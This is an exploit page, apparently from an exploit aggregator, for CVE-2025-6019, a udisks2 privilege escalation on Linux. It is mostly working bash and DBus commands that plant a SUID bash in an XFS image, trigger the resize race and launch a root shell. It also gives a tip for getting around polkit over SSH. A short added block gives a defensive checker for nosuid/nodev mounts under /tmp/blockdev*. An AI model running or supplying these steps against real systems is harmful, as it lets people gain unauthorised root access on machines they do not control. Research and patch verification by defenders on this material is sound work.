## https://sploitus.com/exploit?id=793B5C27-64FC-5FCE-AA34-0CEE4A008F38
# CVE-2025-6019: Privilege Escalation Exploit via UDisks2 Filesystem Resize

## Vulnerability Details
- **CVE ID**: CVE-2025-6019
- **Impact**: Local Privilege Escalation (LPE)
- **Affected Systems**: Linux systems with vulnerable `udisks2` versions
- **Mechanism**: Race condition during filesystem resize allows access to SUID binaries in world-writable temporary directories
- **Key Components**: 
  - `udisks2` service (DBus interface)
  - `org.freedesktop.UDisks2.Filesystem.Resize` method
  - Temporary mount points under `/tmp/blockdev*`

## Exploit Workflow
### 1. Prepare Malicious Filesystem Image (Attacker)
```bash
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount
chmod 04555 ./xfs.mount/bash  # Set SUID bit
umount ./xfs.mount 
```

### 2. Trigger Exploit (Victim Machine)
```bash
# Verify system capabilities
gdbus call --system --dest org.freedesktop.login1 \
  --object-path /org/freedesktop/login1 \
  --method org.freedesktop.login1.Manager.CanReboot

# Clear interference
killall -KILL gvfs-udisks2-volume-monitor

# Setup loop device
udisksctl loop-setup --file ./xfs.image --no-user-interaction

# Background watcher (executes when SUID binary appears)
while true; do 
  /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break
done 2>/dev/null &

# Trigger vulnerability via DBus
gdbus call --system --dest org.freedesktop.UDisks2 \
  --object-path /org/freedesktop/UDisks2/block_devices/loop0 \
  --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
```

### 3. Gain Root Access
```bash
/tmp/blockdev*/bash -p  # Launch privileged shell
id
# uid=65534(nobody) gid=65534(nobody) euid=0(root)
```
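
A defender-side check for the condition this workflow depends on, added here and not part of the original PoC: it reads a mount table in `/proc/mounts` layout and reports mounts under `/tmp/blockdev*` that lack `nosuid` or `nodev`. The function names and the sample table are constructed for illustration.

```bash
# Added example, not part of the PoC.
# Reads a mount table in /proc/mounts layout on stdin:
#   device mountpoint fstype options dump pass
# Prints one line per mount under /tmp/blockdev* that lacks nosuid or nodev.
find_risky_blockdev_mounts() (
  while read -r dev mnt fstype opts rest; do
    case $mnt in
      /tmp/blockdev*) ;;   # temporary mount points named on this page
      *) continue ;;
    esac
    missing=
    case ",$opts," in
      *,nosuid,*) ;;
      *) missing=nosuid ;;
    esac
    case ",$opts," in
      *,nodev,*) ;;
      *) missing=${missing:+$missing,}nodev ;;
    esac
    if [ -n "$missing" ]; then
      printf '%s %s %s missing=%s\n' "$dev" "$mnt" "$fstype" "$missing"
    fi
  done
)

# List setuid regular files below a flagged mount point, staying on
# that filesystem (-xdev).
list_suid_files() {
  find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Constructed sample table (not captured from a real host).
sample_mounts() {
  cat <<'EOF'
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
/dev/loop0 /tmp/blockdev.AAAAAA xfs rw,relatime,attr2,inode64 0 0
/dev/loop1 /tmp/blockdev.BBBBBB xfs rw,nosuid,nodev,relatime 0 0
EOF
}
```

On a live host, run `find_risky_blockdev_mounts < /proc/mounts` and pass each reported mount point to `list_suid_files`. The watcher loop above polls until the mount appears, so a single run can miss it; schedule the check or run it in a loop while testing.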

## Important!
The exploit works only from a logind session!

- The script must run from a logind session that is
  Active=yes and Remote=no (e.g. tty1).
- When it is started from an SSH / pts/* / reverse-shell session, the
  `udisksctl loop-setup --no-user-interaction` call is denied by
  polkit, so the PoC bails out with
  "Failed to create loop device".

Notice:
- To use the exploit over SSH, you must drop a temporary polkit rule.
## How to Use the Exploit

### Create SUID Image
```bash
$ sudo bash exploit.sh create 
```

### Exploit System
```bash
$ bash exploit.sh exploit 
```

### POC Video

![poc](https://github.com/user-attachments/assets/b941cdd1-c21a-4247-a649-94100f83a15c)